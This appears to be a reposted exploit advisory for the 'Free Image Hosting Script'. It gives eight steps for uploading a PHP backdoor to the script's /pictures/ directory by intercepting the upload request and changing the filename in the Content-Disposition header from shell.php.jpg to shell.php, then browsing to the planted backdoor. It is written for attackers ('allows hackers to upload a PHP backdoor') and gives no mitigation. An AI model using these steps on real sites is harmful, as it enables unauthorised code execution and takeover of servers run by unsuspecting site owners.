Free Image Hosting Script Remote File Upload Vulnerability 

Exploit Title: Free Image Hosting Script [ALL VERSIONS] Remote File 

 

Upload Vulnerability 

 

作者: ySecurity 

软件开发者: http://www.photohostingscript.com 

影响版本: All versions effected 

缺陷: Remote File Upload 

测试平台: Windows 7 

已经通知开发者

 

请注意: You will ONLY be able to find your shell if the "/pictures" 

 

directory and if the directory is not forbidden. 

 

  

 

This exploit allows hackers to upload a PHP backdoor into "/pictures/" 

 

directory via the use of Live HTTP Headers (Firefox Addon) 

 

缺陷分析

 

Tools Needed: Live HTTP Headers, Backdoor Shell 

 

  

 

Step 1: Locate upload form on index page. 

 

Step 2: Rename your shell to shell.php.jpg and start capturing data with 

 

Live HTTP Headers 

 

Step 3: Enter tags for the image (can be anything) 

 

Step 4: Replay data with Live HTTP Headers - 

 

Step 5: Change [Content-Disposition: form-data; name="image1"; 

 

filename="shell.php.jpg"\r\n] to [Content-Disposition: form-data; 

 

name="image1"; filename="shell.php"\r\n] 

 

Step 6: Locate pictures directory: 

 

www.2cto.com /imagehostingscript/pictures/ (usually) 

 

Step 7: Find PHP file (random digits.php) = should look like 

 

(321879194bc8ff2843bf7b63a666f665.php) 

 

Step 8: Navigate to backdoor = 

 

www.2cto.com /imagehostingscript/pictures/321879194bc8ff2843bf7b63a666f665.php